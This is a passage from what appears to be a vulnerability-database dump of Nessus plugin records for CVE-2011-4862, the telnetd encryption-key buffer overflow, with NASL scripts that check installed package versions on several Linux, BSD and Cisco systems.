(rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"krb5-server-ldap-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"krb5-server-ldap-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"krb5-server-ldap-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"krb5-workstation-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"krb5-workstation-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"krb5-workstation-1.6.1-55.el5_6.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2021-01-12T09:47:11", "description": "It was discovered that the encryption support for BSD telnetd contains\na pre-authentication buffer overflow, which may enable remote\nattackers who can connect to the Telnet port to execute arbitrary code\nwith root privileges.", "edition": 17, "published": "2012-01-12T00:00:00", "title": "Debian DSA-2375-1 : krb5, krb5-appl - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-12T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:krb5-appl", "p-cpe:/a:debian:debian_linux:krb5", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-2375.NASL", "href": "https://www.tenable.com/plugins/nessus/57515", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2375. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57515);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_xref(name:\"DSA\", value:\"2375\");\n\n script_name(english:\"Debian DSA-2375-1 : krb5, krb5-appl - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the encryption support for BSD telnetd contains\na pre-authentication buffer overflow, which may enable remote\nattackers who can connect to the Telnet port to execute arbitrary code\nwith root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://packages.debian.org/source/squeeze/krb5-appl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2375\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the krb5 and krb5-appl packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.6.dfsg.4~beta1-5lenny7 of krb5.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:1.0.1-1.2 of krb5-appl.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:krb5-appl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"krb5\", reference:\"1.6.dfsg.4~beta1-5lenny7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"krb5-clients\", reference:\"1:1.0.1-1.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"krb5-ftpd\", reference:\"1:1.0.1-1.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"krb5-rsh-server\", reference:\"1:1.0.1-1.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"krb5-telnetd\", reference:\"1:1.0.1-1.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:43:19", "description": "The MIT Kerberos Team reports :\n\nWhen an encryption key is supplied via the TELNET protocol, its length\nis not validated before the key is copied into a fixed-size buffer.\nAlso see MITKRB5-SA-2011-008.", "edition": 27, "published": "2011-12-27T00:00:00", "title": "FreeBSD : krb5-appl -- telnetd code execution vulnerability (4ddc78dc-300a-11e1-a2aa-0016ce01e285)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-27T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:krb5-appl"], "id": "FREEBSD_PKG_4DDC78DC300A11E1A2AA0016CE01E285.NASL", 
"href": "https://www.tenable.com/plugins/nessus/57403", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57403);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"FreeBSD\", value:\"SA-11:08.telnetd\");\n\n script_name(english:\"FreeBSD : krb5-appl -- telnetd code execution vulnerability (4ddc78dc-300a-11e1-a2aa-0016ce01e285)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MIT Kerberos Team reports :\n\nWhen an encryption key is supplied via the TELNET protocol, its length\nis not validated before the key is copied into a fixed-size buffer.\nAlso see MITKRB5-SA-2011-008.\"\n );\n # http://security.FreeBSD.org/advisories/FreeBSD-SA-11:08.telnetd.asc\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bcb80033\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/4ddc78dc-300a-11e1-a2aa-0016ce01e285.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6a55198\"\n );\n 
script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:krb5-appl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"krb5-appl<1.0.2_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:09:24", "description": "This update incorporates the upstream patch to fix a buffer overflow\nin the Kerberos-aware telnet server.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2012-01-06T00:00:00", "title": "Fedora 16 : krb5-appl-1.0.2-2.fc16 (2011-17493)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:krb5-appl", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2011-17493.NASL", "href": "https://www.tenable.com/plugins/nessus/57443", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-17493.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57443);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"FEDORA\", value:\"2011-17493\");\n\n script_name(english:\"Fedora 16 : krb5-appl-1.0.2-2.fc16 (2011-17493)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update incorporates the upstream patch to fix a buffer overflow\nin the Kerberos-aware telnet server.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=770325\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/071640.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9b696d1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected krb5-appl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-appl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"krb5-appl-1.0.2-2.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-appl\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:32:24", "description": "According to its self-reported version, the version of AsyncOS running\non the remote Cisco Email Security Appliance (ESA) is affected by a\nremote code execution vulnerability due to a buffer overflow condition\nin the telnet component.", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-11-17T00:00:00", "title": "Cisco 
Email Security Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:cisco:email_security_appliance_firmware", "cpe:/o:cisco:asyncos", "cpe:/h:cisco:email_security_appliance"], "id": "CISCO-SA-20120126-ESA.NASL", "href": "https://www.tenable.com/plugins/nessus/79271", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79271);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"EDB-ID\", value:\"18280\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCzv32432\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20120126-ironport\");\n\n script_name(english:\"Cisco Email Security Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)\");\n script_summary(english:\"Checks the ESA version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote security appliance is missing a vendor-supplied security\npatch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of AsyncOS running\non the remote Cisco Email Security Appliance (ESA) is affected by a\nremote code execution vulnerability due to a buffer overflow condition\nin the telnet component.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6a6592a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCzv32432\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant update referenced 
in Cisco Security Advisory\ncisco-sa-20120126-ironport.\n\nAlternatively, as a workaround, the vendor notes that Telnet services\ncan be disabled on the device.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:email_security_appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:asyncos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:email_security_appliance_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_esa_version.nasl\");\n script_require_keys(\"Host/AsyncOS/Cisco Email Security Appliance/DisplayVersion\", \"Host/AsyncOS/Cisco Email Security Appliance/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndisplay_ver = get_kb_item_or_exit('Host/AsyncOS/Cisco Email Security Appliance/DisplayVersion');\nver = get_kb_item_or_exit('Host/AsyncOS/Cisco Email Security Appliance/Version');\n\n# If not paranoid, check if telnet is detected first.\n# get_service() may fork; don't use.\nif (report_paranoia < 2) get_kb_list_or_exit(\"Services/telnet\");\n\n# Affected/Fixed Cisco AsyncOS Software for Cisco ESA :\n# 7.1 and prior - 7.1.5-101\n# 7.3 - 7.3.1-101\n# 7.5 - 7.5.1-102\n# 7.6 - 7.6.1-022\n# 8.0 - Not Affected\n# 8.5 - Not Affected\n# 8.6 - Not Affected\nif (ver =~ \"^[0-6]\\.\" || ver =~ \"^7\\.[01]\\.\")\n display_fix = '7.1.5-101';\nelse if (ver =~ \"^7\\.3\\.\")\n display_fix = '7.3.1-101';\nelse if (ver =~ \"^7\\.5\\.\")\n display_fix = '7.5.1-102';\nelse if (ver =~ \"^7\\.6\\.\")\n display_fix = '7.6.1-022';\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'Cisco ESA', display_ver);\n\nfix = str_replace(string:display_fix, find:'-', replace:'.');\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0) audit(AUDIT_INST_VER_NOT_VULN, 'Cisco ESA', display_ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + display_fix + \n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:53:33", "description": "A vulnerability has been discovered and corrected in krb5-appl,\nheimdal and netkit-telnet :\n\nAn unauthenticated remote attacker can cause a buffer overflow and\nprobably execute arbitrary code with the privileges of the telnet\ndaemon (CVE-2011-4862).\n\nIn Mandriva 
the telnetd daemon from the netkit-telnet-server package\ndoes not have an initscript to start and stop the service, however one\ncould rather easily craft an initscript or start the service by other\nmeans rendering the system vulnerable to this issue.\n\nThe updated packages have been patched to correct this issue.", "edition": 25, "published": "2011-12-29T00:00:00", "title": "Mandriva Linux Security Advisory : krb5-appl (MDVSA-2011:195)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-29T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:krb5-appl-clients", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:netkit-telnet-server", "p-cpe:/a:mandriva:linux:krb5-appl-servers", "p-cpe:/a:mandriva:linux:netkit-telnet"], "id": "MANDRIVA_MDVSA-2011-195.NASL", "href": "https://www.tenable.com/plugins/nessus/57412", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:195. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57412);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_xref(name:\"MDVSA\", value:\"2011:195\");\n\n script_name(english:\"Mandriva Linux Security Advisory : krb5-appl (MDVSA-2011:195)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in krb5-appl,\nheimdal and netkit-telnet :\n\nAn unauthenticated remote attacker can cause a buffer overflow and\nprobably execute arbitrary code with the privileges of the telnet\ndaemon (CVE-2011-4862).\n\nIn Mandriva the telnetd daemon from the netkit-telnet-server package\ndoes not have an initscript to start and stop the service, however one\ncould rather easily craft an initscript or start the service by other\nmeans rendering the system vulnerable to this issue.\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n 
script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-appl-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-appl-servers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:netkit-telnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:netkit-telnet-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif 